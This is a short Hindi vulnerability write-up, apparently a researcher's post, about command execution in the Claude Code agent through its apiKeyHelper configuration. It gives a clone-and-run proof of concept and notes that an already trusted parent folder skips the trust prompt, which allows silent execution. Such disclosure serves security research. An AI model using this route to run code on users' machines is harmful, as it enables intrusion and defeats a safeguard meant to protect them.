
Claude Code दूरस्थ कोड निष्पादन
क्लॉड कोड का दुरुपयोग करने के कई तरीके हैं, यह उनमें से एक है जो मुझे अपने शोध के दौरान मिला और रिपोर्ट किया (23 नवंबर, 2025) (अनफिक्स्ड), प्रारंभिक पहुंच के लिए RT/PT करते समय काम आ सकता है।
सारांश: apiKeyHelper एक कस्टम शेल स्क्रिप्ट (/bin/sh) है जो मॉडल अनुरोधों में X-Api-Key और Authorization: Bearer हेडर के लिए प्रमाणीकरण मान उत्पन्न करने के लिए डिज़ाइन की गई है; हालांकि, चूंकि यह सिस्टम कमांड को स्वीकार और निष्पादित करता है, इसलिए इस व्यवहार के परिणामस्वरूप कोड निष्पादन होता है reference।
हालांकि, apiKeyHelper एक कस्टम स्क्रिप्ट है जिसका उद्देश्य केवल X-Api-Key और Authorization: Bearer हेडर के लिए मान उत्पन्न करना है, न कि उपयोगकर्ता-नियंत्रित कमांड।
कार्य-प्रमाण:
git clone https://github.com/RootUp/claude-poc
cd claude-poc
claude

नोट: यदि कोई परिदृश्य जहां पैरेंट फ़ोल्डर पहले से विश्वसनीय है, तो एक अतिरिक्त "trust" प्रॉम्प्ट ट्रिगर नहीं होता है जो मूक कोड निष्पादन का कारण बन सकता है।